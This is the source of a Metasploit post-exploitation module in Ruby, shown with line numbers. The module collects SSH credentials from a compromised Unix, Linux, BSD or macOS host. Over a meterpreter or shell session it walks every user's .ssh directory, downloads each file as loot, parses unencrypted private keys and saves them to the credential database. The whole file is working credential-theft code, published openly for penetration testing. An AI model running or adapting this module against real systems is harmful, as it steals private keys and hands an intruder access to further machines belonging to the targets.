Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'sshkey'
7

8
class MetasploitModule < Msf::Post
9
  include Msf::Post::File
10
  include Msf::Post::Unix
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Multi Gather OpenSSH PKI Credentials Collection',
17
        'Description' => %q{
18
          This module will collect the contents of all users' .ssh directories on the targeted
19
          machine. Additionally, known_hosts and authorized_keys and any other files are also
20
          downloaded. This module is largely based on firefox_creds.rb.
21
        },
22
        'License' => MSF_LICENSE,
23
        'Author' => ['Jim Halfpenny'],
24
        'Platform' => %w[bsd linux osx unix],
25
        'SessionTypes' => ['meterpreter', 'shell' ],
26
        'Compat' => {
27
          'Meterpreter' => {
28
            'Commands' => %w[
29
              stdapi_fs_ls
30
              stdapi_fs_separator
31
            ]
32
          }
33
        }
34
      )
35
    )
36
  end
37

38
  def run
39
    print_status('Finding .ssh directories')
40
    paths = enum_user_directories.map { |d| d + '/.ssh' }
41
    # Array#select! is only in 1.9
42
    paths = paths.select { |d| directory?(d) }
43

44
    if paths.nil? || paths.empty?
45
      print_error('No users found with a .ssh directory')
46
      return
47
    end
48

49
    print_status("Looting #{paths.count} .ssh directories")
50
    download_loot(paths)
51
  end
52

53
  def download_loot(paths)
54
    paths.each do |path|
55
      path.chomp!
56

57
      print_status("Looting #{path} directory")
58

59
      unless executable?(path)
60
        print_warning("Cannot access directory: #{path} . Missing execute permission. Skipping.")
61
        next
62
      end
63

64
      if session.type == 'meterpreter'
65
        sep = session.fs.file.separator
66
        files = session.fs.dir.entries(path)
67
      else
68
        # Guess, but it's probably right
69
        sep = '/'
70
        files = cmd_exec("ls -1 #{path}").split(/\r\n|\r|\n/)
71
      end
72
      path_array = path.split(sep)
73
      path_array.pop
74
      user = path_array.pop
75
      files.each do |file|
76
        next if ['.', '..'].include?(file)
77

78
        file_path = "#{path}#{sep}#{file}"
79

80
        unless readable?(file_path)
81
          print_warning("Cannot read file: #{file_path} . Missing read permission. Skipping.")
82
          next
83
        end
84

85
        data = read_file("#{path}#{sep}#{file}")
86
        file = file.split(sep).last
87

88
        loot_path = store_loot("ssh.#{file}", 'text/plain', session, data, "ssh_#{file}", "OpenSSH #{file} File")
89
        print_good("Downloaded #{path}#{sep}#{file} -> #{loot_path}")
90

91
        # store only ssh private keys
92
        next if SSHKey.valid_ssh_public_key? data
93

94
        begin
95
          key = SSHKey.new(data, passphrase: '')
96

97
          credential_data = {
98
            origin_type: :session,
99
            session_id: session_db_id,
100
            post_reference_name: refname,
101
            private_type: :ssh_key,
102
            private_data: key.key_object.to_s,
103
            username: user,
104
            workspace_id: myworkspace_id
105
          }
106

107
          create_credential(credential_data)
108
        rescue OpenSSL::OpenSSLError => e
109
          print_error("Could not load SSH Key: #{e.message}")
110
        end
111
      end
112
    end
113
  end
114
end
115

116